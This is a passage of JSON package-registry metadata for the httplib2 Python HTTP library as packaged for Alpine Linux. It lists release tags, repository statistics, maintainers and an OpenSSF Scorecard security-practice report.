pkg:github/httplib2/httplib2@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0/manifests"},{"name":"v0.11.3","sha":"70fb0c820d2e8211992b402d34444e4b32a1cb6e","kind":"commit","published_at":"2018-03-30T02:21:39.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3/manifests"},{"name":"v0.11.2","sha":"470bb2a9db658b7f851522051f2b0201a21e8925","kind":"commit","published_at":"2018-03-30T02:09:45.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2/manifests"},{"name":"v0.11.1","sha":"f20cd36c44b75d9206f050304937d5f4d63f5b7a","kind":"commit","published_at":"2018-03-26T17:15:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1/manifests"},{"name":"v0.11.0","sha":"5dee729d87cecab1b6c0d7874a8bbd8d24452849","kind":"commit","published_at":"2018-03-21T18:13:04.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0/manifests"},{"name":"v0.10.3","sha":"1ae16e0e8e868e4b81225631ee37c6555493014b","kind":"commit","published_at":"2017-02-06T17:56:20.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3/manifests"},{"name":"v0.10.2","sha":"ef81f9566ee765b8f3d93429e3dfa17341d098e7","kind":"commit","published_at":"2017-02-03T21:09:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2/manifests"},{"name":"v0.10.1","sha":"4623377a073e1027a691fe139ba1e851eabf0d49","kind":"commit","published_at":"2017-02-03T19:43:17.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1/manifests"},{"name":"0.9.2","sha":"cf631a73e2f3f43897b65206127ced82382d35f5","kind":"tag","published_at":"2015-09-28T13:53:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2/manifests"},{"name":"0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"tag","published_at":"2015-09-28T13:52:59.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1/manifests"},{"name":"v0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"commit","published_at":"2015-04-11T13:50:15.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1/manifests"},{"name":"v0.9","sha":"058a1f9448d5c27c23772796f83a596caf9188e6","kind":"commit","published_at":"2014-04-15T12:53:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9/manifests"},{"name":"0.9","sha":"0197ec868a4fc638c08358b94200ffd6ddb1bf50","kind":"tag","published_at":"2014-04-14T12:50:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9/manifests"}]},"repo_metadata_updated_at":"2026-08-21T15:19:08.727Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:apk/alpine/py3-httplib2-pyc?arch=x86_64\u0026repository_url=https://pkgs.alpinelinux.org/packages?branch=v3.20","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/alpine/py3-httplib2-pyc","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/alpine/py3-httplib2-pyc","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/alpine/py3-httplib2-pyc/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-21T12:09:40.812Z","issues_count":64,"pull_requests_count":61,"avg_time_to_close_issue":13710979.942857143,"avg_time_to_close_pull_request":12412190.204545455,"issues_closed_count":35,"pull_requests_closed_count":44,"pull_request_authors_count":42,"issue_authors_count":59,"avg_comments_per_issue":3.796875,"avg_comments_per_pull_request":2.4098360655737703,"merged_pull_requests_count":31,"bot_issues_count":0,"bot_pull_requests_count":4,"past_year_issues_count":5,"past_year_pull_requests_count":5,"past_year_avg_time_to_close_issue":520238.0,"past_year_avg_time_to_close_pull_request":596027.3333333334,"past_year_issues_closed_count":3,"past_year_pull_requests_closed_count":3,"past_year_pull_request_authors_count":5,"past_year_issue_authors_count":5,"past_year_avg_comments_per_issue":2.4,"past_year_avg_comments_per_pull_request":0.8,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":1,"past_year_merged_pull_requests_count":3,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/issues","maintainers":[{"login":"temoto","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}],"active_maintainers":[{"login":"temoto","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.20/packages/py3-httplib2-pyc/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.20/packages/py3-httplib2-pyc/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.20/packages/py3-httplib2-pyc/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.20/packages/py3-httplib2-pyc/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.20/packages/py3-httplib2-pyc/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.20/packages/py3-httplib2-pyc/codemeta","maintainers":[{"uuid":"fabian@affolter-engineering.ch","login":null,"name":"Fabian Affolter","email":"fabian@affolter-engineering.ch","url":"https://pkgs.alpinelinux.org/packages?maintainer=Fabian Affolter","packages_count":190,"html_url":"https://pkgs.alpinelinux.org/packages?maintainer=Fabian Affolter","role":null,"created_at":"2024-06-12T01:11:31.280Z","updated_at":"2024-06-12T01:11:31.280Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.20/maintainers/fabian@affolter-engineering.ch/packages"}],"registry":{"name":"alpine-v3.20","url":"https://pkgs.alpinelinux.org/packages?branch=v3.20","ecosystem":"alpine","default":false,"packages_count":24162,"maintainers_count":405,"namespaces_count":2,"keywords_count":4251,"github":"alpinelinux","metadata":{"repos":["main","community"],"funded_packages_count":1543},"icon_url":"https://github.com/alpinelinux.png","created_at":"2024-06-07T11:51:39.915Z","updated_at":"2026-08-24T05:06:36.705Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.20/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.20/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.20/namespaces"}},{"id":13009002,"name":"py3-httplib2","ecosystem":"alpine","description":"HTTP client library","homepage":"https://github.com/httplib2/httplib2","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/httplib2/httplib2","keywords_array":[],"namespace":"community","versions_count":1,"first_release_published_at":"2025-09-05T04:34:46.000Z","latest_release_published_at":"2025-09-05T04:34:46.000Z","latest_release_number":"0.30.0-r0","last_synced_at":"2026-04-01T09:01:49.462Z","created_at":"2026-01-31T00:50:08.437Z","updated_at":"2026-08-21T15:19:08.820Z","registry_url":"https://pkgs.alpinelinux.org/package/v3.23/community/x86_64/py3-httplib2","install_command":"apk add py3-httplib2","documentation_url":null,"metadata":{"repository":"community","architecture":"x86_64"},"repo_metadata":{"id":5379896,"uuid":"53002916","full_name":"httplib2/httplib2","owner":"httplib2","description":"Small, fast HTTP client library for Python. Features persistent connections, cache, and Google App Engine support. Originally written by Joe Gregorio, now supported by community.","archived":false,"fork":false,"pushed_at":"2026-06-26T10:10:15.000Z","size":3934,"stargazers_count":512,"open_issues_count":63,"forks_count":189,"subscribers_count":22,"default_branch":"master","last_synced_at":"2026-08-21T12:21:59.455Z","etag":null,"topics":["http","http-client","network","python"],"latest_commit_sha":null,"homepage":"http://httplib2.readthedocs.io/","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"other","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/httplib2.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG","contributing":"contributing.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2016-03-02T22:59:52.000Z","updated_at":"2026-08-19T07:11:22.000Z","dependencies_parsed_at":"2024-06-18T12:23:46.605Z","dependency_job_id":"dbfee945-96d9-41e9-8932-65c2aca77af6","html_url":"https://github.com/httplib2/httplib2","commit_stats":{"total_commits":538,"total_committers":73,"mean_commits":7.36986301369863,"dds":0.6561338289962826,"last_synced_commit":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7"},"previous_names":[],"tags_count":43,"template":false,"template_full_name":null,"purl":"pkg:github/httplib2/httplib2","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/sbom","scorecard":{"id":471277,"data":{"date":"2025-08-11","repo":{"name":"github.com/httplib2/httplib2","commit":"1a6ff781792099e9e14d7beb610bd99112b17b07"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.4,"checks":[{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Code-Review","score":3,"reason":"Found 10/27 approved changesets -- score normalized to 3","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Maintained","score":1,"reason":"2 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 1","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/publish.yaml:1","Warn: no topLevel permission defined: .github/workflows/style.yaml:1","Warn: no topLevel permission defined: .github/workflows/test.yaml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:45: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:69: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:75: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:99: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:107: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:113: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:58: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: pipCommand not pinned by hash: script/test:28","Warn: pipCommand not pinned by hash: script/test:36","Warn: pipCommand not pinned by hash: script/test:42","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:112","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:35","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:74","Warn: pipCommand not pinned by hash: .github/workflows/style.yaml:26","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:42","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:44","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:69","Info:   0 out of  16 GitHub-owned GitHubAction dependencies pinned","Info:   1 out of  11 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Fuzzing","score":10,"reason":"project is fuzzed","details":["Info: OSSFuzz integration found","Info: PythonAtherisFuzzer integration found: tests/fuzz_request.py:2","Info: PythonAtherisFuzzer integration found: tests/fuzz_url.py:2"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":9,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Warn: project license file does not contain an FSF or OSI license."],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-79v4-65xg-pq4g"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 16 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-19T13:56:43.862Z","repository_id":5379896,"created_at":"2025-08-19T13:56:43.862Z","updated_at":"2025-08-19T13:56:43.862Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36802710,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-21T02:00:06.756Z","response_time":57,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"httplib2","name":"httplib2","uuid":"17128733","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/17128733?v=4","repositories_count":1,"last_synced_at":"2024-03-25T18:41:02.027Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/httplib2","funding_links":[],"total_stars":482,"followers":7,"following":0,"created_at":"2022-11-02T16:22:04.713Z","updated_at":"2024-03-25T18:41:02.043Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2/repositories"},"tags":[{"name":"v0.32.0","sha":"ba9bf505cd899f522f2bb58ca608444adf49afc1","kind":"commit","published_at":"2026-06-26T10:07:36.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.32.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0/manifests"},{"name":"v0.31.2","sha":"a99a11fba8d5fa3bb9c47827e5cbfd641dfb88d3","kind":"commit","published_at":"2026-01-23T10:59:34.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2/manifests"},{"name":"v0.31.1","sha":"6d2ea322d53a03d058cd8e63c12871cdd1127ca9","kind":"commit","published_at":"2026-01-13T12:08:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1/manifests"},{"name":"v0.31.0","sha":"26cfea5d07a5817cf214d9978c856c91abf4e078","kind":"commit","published_at":"2025-09-11T12:04:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0/manifests"},{"name":"v0.30.2","sha":"d9278ceafb7a05be9998a7a4b1cb7d6d3f689ee5","kind":"commit","published_at":"2025-09-10T17:35:30.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2/manifests"},{"name":"v0.30.1","sha":"6cfe2e6b5aff994f07fa0dcddfacf6d3a7999b1b","kind":"commit","published_at":"2025-09-10T16:57:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"ddfbfd579775027af57121d69f6bd913f01f9471","kind":"commit","published_at":"2025-08-29T17:58:43.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.